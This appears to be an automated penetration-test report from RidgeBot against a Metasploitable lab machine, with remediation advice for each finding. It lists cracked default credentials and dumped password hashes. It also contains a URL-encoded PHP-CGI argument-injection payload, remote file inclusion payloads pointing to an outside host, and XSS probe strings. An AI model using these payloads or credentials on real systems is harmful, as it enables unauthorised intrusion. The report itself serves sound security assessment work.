Audit report generated by RidgeBot
Jul 28, 2020 at 11:00
Total number of targets: 2
Task Name | Start Time | End Time | Total Time | Status |
---|---|---|---|---|
Meta Pen-test | Jul 27, 2020 at 17:26 | Jul 28, 2020 at 11:00 | 17.0 hours and 34.0 minutes | Success |
In this task, we tested 1 IP and 1 web server. The Total Health Score of the target system is 6, on a 100-point scale. It is a comprehensive evaluation based on multiple factors such as percentage of vulnerability, attack surface, encrypted traffic, etc. With a score of 6, this test system is considered to be in a "risky" condition. The vulnerabilities found on each asset can be found in "Asset Detail".
RidgeBot successfully performed 11 exploits. These 11 exploited risks are critical and require immediate attention: a real hacker could easily achieve the same result. In "Exploit Details", we provide information on how RidgeBot attacked (path, techniques, actions, etc.) so that the security team can replicate and fix the issue.
Among 11 exploits, 82% "Credentials" was compromised; 18 "shell" access was gained
Category | Count |
---|---|
Exploited | 11 |
High vulnerabilities | 365 |
Medium vulnerabilities | 114 |
Low vulnerabilities | 15 |
Total number of targets: | 2 |
Number of active assets: | 1 |
Number of active Domains: | 1 |
Number of attack surface(s): | 820 |
In addition, RidgeBot found 365 high, 114 medium and 15 low vulnerabilities. These vulnerabilities are possible risks: they might be exploitable, but exploiting them may take a bigger risk or larger effort for a hacker. They should be attended to in order to achieve a comprehensive defense system. Please refer to "Vulnerability Details" for more information and remediation suggestions.
System Template | Customized Template | Plugins Selected | Scan Type | Scraping Mode | Attack Mode |
---|---|---|---|---|---|
Full Scan | N/A | 59728 | Host and Web | Crawling | Targeted |
IP | OS Type | EXPLOITED | HIGH | MEDIUM | LOW |
---|---|---|---|---|---|
192.168.105.200 | | 11 | 11 | 12 | 2 |
Domain | IP | EXPLOITED | HIGH | MEDIUM | LOW |
---|---|---|---|---|---|
http://192.168.105.200 | | 0 | 354 | 102 | 13 |
A weak SSH password is easy to brute-force, and users with weak passwords exist. Control of the system can be obtained by logging in with the weak password.
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | Account: msfadmin Password: msfadmin |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Allow logins only from specified IP addresses.
A weak SSH password is easy to brute-force, and users with weak passwords exist. Control of the system can be obtained by logging in with the weak password.
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | System Info: linux Host Name: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Allow logins only from specified IP addresses.
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
Node(s) | Additional Information |
---|---|
192.168.105.200:21 | Account: service Password: $1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu// |
192.168.105.200:21 | Account: klog Password: $1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0 |
192.168.105.200:21 | Account: sys Password: $1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0 |
192.168.105.200:21 | Account: user Password: $1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0 |
192.168.105.200:21 | Account: msfadmin Password: $1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/ |
192.168.105.200:21 | Account: postgres Password: $1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/ |
192.168.105.200:21 | Account: root Password: $1$Mg433GgT$OSXrv7RuOesy5vKAZw7BE/ |
# | Reference |
---|---|
1 | http://pastebin.com/AetT9sS5 |
2 | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html |
None
SMB is a file sharing service; if it is accessed by unauthorized users, they can access all shared files. It can also be used in combination with MS17-010 vulnerabilities.
Node(s) | Additional Information |
---|---|
192.168.105.200:445 | Account: msfadmin Password: msfadmin |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Allow logins only from specified IP addresses.
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
Node(s) | Additional Information |
---|---|
192.168.105.200:21 | System Info: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux Host Name: metasploitable |
# | Reference |
---|---|
1 | http://pastebin.com/AetT9sS5 |
2 | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html |
None
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
CVE: [*]
CVSS Score: 10.0
Node(s) | Additional Information |
---|---|
192.168.105.200:21 | Target 192.168.105.200:21 has VSFTPD v2.3.4 Backdoor Command Execution |
# | Reference |
---|---|
1 | http://pastebin.com/AetT9sS5 |
2 | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html |
None
A backdoor is installed on the remote host. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected system.
CVE: [*]
CVSS Score: 10.0
Node(s) | Additional Information |
---|---|
192.168.105.200:1524 | Target: IP: 192.168.105.200 Port: 1524, A backdoor is installed on the remote host. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected system. |
# | Reference |
---|---|
N/A |
OS End Of Life Detection: The operating system on the remote host has reached the end of life and should not be used anymore.
CVE: [*]
CVSS Score: 10.0
Node(s) | Additional Information |
---|---|
192.168.105.200 | Target: IP 192.168.105.200, OS End Of Life Detection: The operating system on the remote host has reached the end of life and should not be used anymore. |
# | Reference |
---|---|
N/A |
Multiple Java products that implement the RMI Server contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system with elevated privileges.
CVE: [*]
CVSS Score: 10.0
Node(s) | Additional Information |
---|---|
192.168.105.200:1099 | Target: IP: 192.168.105.200 Port: 1099, Multiple Java products that implement the RMI Server contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system with elevated privileges. |
# | Reference |
---|---|
1 | https://tools.cisco.com/security/center/viewAlert.x?alertId=23665 |
Disable class-loading.
A weak SSH password is easy to brute-force, and users with weak passwords exist. Control of the system can be obtained by logging in with the weak password.
CVE: [*]
CVSS Score: 9.8
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | Target: 192.168.105.200:22, SSH service has weak password vulnerability: User name: root password: root |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Allow logins only from specified IP addresses.
SMB is a file sharing service; if it is accessed by unauthorized users, they can access all shared files. It can also be used in combination with MS17-010 vulnerabilities.
CVE: [*]
CVSS Score: 9.8
Node(s) | Additional Information |
---|---|
192.168.105.200:445 | Target: 192.168.105.200:445, SMB (Shared File Service) has a weak password vulnerability: User name: msfadmin password: msfadmin |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Allow logins only from specified IP addresses.
NFS (Network File System) is one of the file systems supported by FreeBSD. It allows computers in a network to share resources over a TCP/IP network. Client applications of local NFS can read and write files on remote NFS servers transparently, just like accessing local files.
CVE: [*]
CVSS Score: 9.8
Node(s) | Additional Information |
---|---|
192.168.105.200:2049 | Target: 192.168.105.200 has an NFS configuration that causes an information vulnerability |
# | Reference |
---|---|
N/A |
Modify the NFS configuration file /etc/exports to specify the IP addresses or network segments that are allowed to view the shared files.
Try to log in with given passwords via VNC protocol.
CVE: [*]
CVSS Score: 9.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5900 | Target: IP: 192.168.105.200 Port: 5900,Try to log in with given passwords via VNC protocol. |
# | Reference |
---|---|
N/A |
Change the password to something hard to guess.
Some websites need to provide file viewing or downloading functions because of business needs. However, if there is no restriction on the files that users can view or download, malicious users can view or download any sensitive files. This is the file viewing and downloading vulnerability. It arises when:
* a function that reads files exists;
* the path of the file to read is user-controllable and is not checked, or not rigorously checked;
* the file content is output.
An attacker can download arbitrary files from the server, such as script code and service and system configuration files. The obtained code can be audited further to find more exploitable vulnerabilities.
CVE: [*]
CVSS Score: 8.6
Node(s) | Additional Information |
---|---|
http://192.168.105.200/mutillidae/?page=add-to-your-blog.php | Target http://192.168.105.200/mutillidae/?page=add-to-your-blog.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php | Target http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php | Target http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?page=home.php | Target http://192.168.105.200/mutillidae/index.php?page=home.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php | Target http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/?page=show-log.php | Target http://192.168.105.200/mutillidae/?page=show-log.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/?page=text-file-viewer.php | Target http://192.168.105.200/mutillidae/?page=text-file-viewer.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target http://192.168.105.200/mutillidae/index.php?page=captured-data.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous has an arbitrary file read vulnerability |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/PHP_File_Inclusion |
2 | https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion |
3 | https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion |
Strictly control the input parameters of users, and filter the response of functions affected by parameters.
When a vulnerable PHP runs web services in CGI mode, the web server can pass the query string to the running php-cgi as a parameter.
CVE: [*]
CVSS Score: 8.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200 | Target: http://192.168.105.200 has PHP-CGI remote code execution (CVE-2012-1823). |
# | Reference |
---|---|
1 | https://nvd.nist.gov/vuln/detail/CVE-2012-1823 |
1. Upgrade PHP to the latest version.
Many PHP installation tutorials instruct the user to create a file called phpinfo.php or similar containing the phpinfo() statement. Such a file is often times left in webserver directory after completion. Some of the information that can be gathered from this file includes: The username of the user who installed php, if they are a SUDO user, the IP address of the host, the web server version, the system version(unix / linux), and the root directory of the web server.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
http://192.168.105.200/phpinfo.php | Target: http://192.168.105.200/phpinfo.php,Many PHP installation tutorials instruct the user to create a file called phpinfo.php or similar containing the phpinfo() statement. Such a file is often times left in webserver directory after completion. Some of the information that can be gathered from this file includes: The username of the user who installed php, if they are a SUDO user, the IP address of the host, the web server version, the system version(unix / linux), and the root directory of the web server. |
http://192.168.105.200/mutillidae/phpinfo.php | Target: http://192.168.105.200/mutillidae/phpinfo.php,Many PHP installation tutorials instruct the user to create a file called phpinfo.php or similar containing the phpinfo() statement. Such a file is often times left in webserver directory after completion. Some of the information that can be gathered from this file includes: The username of the user who installed php, if they are a SUDO user, the IP address of the host, the web server version, the system version(unix / linux), and the root directory of the web server. |
# | Reference |
---|---|
N/A |
Delete them or restrict access to the listed files.
PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
http://192.168.105.200/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E | Target: http://192.168.105.200/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E,PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible. |
# | Reference |
---|---|
1 | http://www.h-online.com/open/news/item/Critical-open-hole-in-PHP-creates-risks-Update-1567532.html |
2 | http://www.kb.cert.org/vuls/id/520827 |
3 | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ |
4 | https://bugs.php.net/bug.php?id=61910 |
5 | http://www.php.net/manual/en/security.cgi-bin.php |
6 | http://www.securityfocus.com/bid/53388 |
PHP has released version 5.4.3 and 5.3.13 to address this vulnerability. PHP is recommending that users upgrade to the latest version of PHP.
vsftpd is prone to a backdoor vulnerability. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected application.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
192.168.105.200:21 | Target: IP: 192.168.105.200 Port: 21, vsftpd is prone to a backdoor vulnerability. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected application. |
192.168.105.200:6200 | Target: IP: 192.168.105.200 Port: 6200, vsftpd is prone to a backdoor vulnerability. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected application. |
# | Reference |
---|---|
1 | http://www.securityfocus.com/bid/48539 |
2 | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html |
3 | https://security.appspot.com/vsftpd.html |
4 | http://vsftpd.beasts.org/ |
The repaired package can be downloaded from https://security.appspot.com/vsftpd.html. Please validate the package with its signature.
A program developer usually puts reusable functions in a separate file. To use a function, the developer calls that file directly instead of writing the function again. This process of calling files is generally referred to as file inclusion. Developers generally want more flexible code, so they set the included file as a variable for dynamic invocation, but because of this flexibility, the client can cause a malicious file to be called, resulting in file inclusion vulnerabilities. Almost all scripting languages provide file inclusion, but file inclusion vulnerabilities are mostly found in PHP web applications, and very few, or even none, in JSP, ASP or ASP.NET programs. This is a drawback of some language designs.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
http://192.168.105.200/mutillidae/?page=show-log.php | Target: http://192.168.105.200/mutillidae/?page=show-log.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.jpg. |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target: http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php | Target: http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/?page=text-file-viewer.php | Target: http://192.168.105.200/mutillidae/?page=text-file-viewer.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.jpg. |
http://192.168.105.200/mutillidae/index.php?page=home.php | Target: http://192.168.105.200/mutillidae/index.php?page=home.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php | Target: http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/?page=add-to-your-blog.php | Target: http://192.168.105.200/mutillidae/?page=add-to-your-blog.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.jpg. |
http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php | Target: http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target: http://192.168.105.200/mutillidae/index.php?page=captured-data.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
# | Reference |
---|---|
N/A |
1. Strict control of user input parameters and response filtering for functions affected by parameters
Misconfigured web servers allow remote clients to perform dangerous HTTP methods such as PUT and DELETE. This script checks if they are enabled and can be misused to upload or delete files. - Enabled PUT method: This might allow an attacker to upload and run arbitrary code on this web server. - Enabled DELETE method: This might allow an attacker to delete additional files on this web server.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
192.168.105.200:80 | Target: IP: 192.168.105.200 Port: 80, Misconfigured web servers allow remote clients to perform dangerous HTTP methods such as PUT and DELETE. This script checks if they are enabled and can be misused to upload or delete files. - Enabled PUT method: This might allow an attacker to upload and run arbitrary code on this web server. - Enabled DELETE method: This might allow an attacker to delete additional files on this web server. |
# | Reference |
---|---|
N/A |
Use access restrictions to these dangerous HTTP methods or disable them completely.
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context, allowing the attacker to access any cookies or session tokens retained by the browser.
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore¶m1=1.6¶m2=1.6 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='TtSL(6019)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='egoY(6294)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='GKmg(5667)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore¶m1=1.10¶m2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore¶m1=1.10¶m2=1.10 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='TkHx(4037)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='IMdT(3879)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiMission?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiMission?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='BJav(5230)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefn?topicparent=TWiki.WebPreferences | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefn?topicparent=TWiki.WebPreferences has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Lgda(7004)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='fKLO(6123)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ainf(6671)'bad=" |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php | Target: http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='pOeh(1770)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php | Target: http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='BBtb(1220)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplate?topicparent=TWiki.WebPreferences | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplate?topicparent=TWiki.WebPreferences has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Wogk(2158)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore¶m1=1.34¶m2=1.34 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore¶m1=1.34¶m2=1.34 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='yvZt(2061)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?t=1595894751&topicparent=5109287037480 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?t=1595894751&topicparent=5109287037480 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='rFEP(2245)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/FileAttribute?topicparent=TWiki.WebHome | Target: http://192.168.105.200/twiki/bin/edit/TWiki/FileAttribute?topicparent=TWiki.WebHome has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='uAbw(7789)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='NjOP(5062)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?topicparent=TWiki.WebRssgFJiGmbjzLvK | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?topicparent=TWiki.WebRssgFJiGmbjzLvK has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='cODd(1579)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore¶m1=1.18¶m2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore¶m1=1.18¶m2=1.18 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='Yqgf(1667)'bad=" |
http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.7¶m2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.7¶m2=1.7 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ChnX(7517)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?t=1595894863&topicparent=4912653023915 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?t=1595894863&topicparent=4912653023915 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='TqtL(3330)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/TWikiGuest?topicparent=TWiki.WikiName | Target: http://192.168.105.200/twiki/bin/edit/Main/TWikiGuest?topicparent=TWiki.WikiName has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='uNci(6867)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle?topicparent=TWiki.GoodStyle | Target: http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle?topicparent=TWiki.GoodStyle has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='oPbY(7559)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.120¶m2=1.120 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.120¶m2=1.120 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='qyDI(7224)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore¶m1=1.18¶m2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore¶m1=1.18¶m2=1.18 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='VQVr(3209)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target: http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='OOgv(3267)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/BillClinton?topicparent=TWiki.WikiName | Target: http://192.168.105.200/twiki/bin/edit/TWiki/BillClinton?topicparent=TWiki.WikiName has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Uktp(1520)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:<ScRiPt >rdLY(8587)</ScRiPt> |
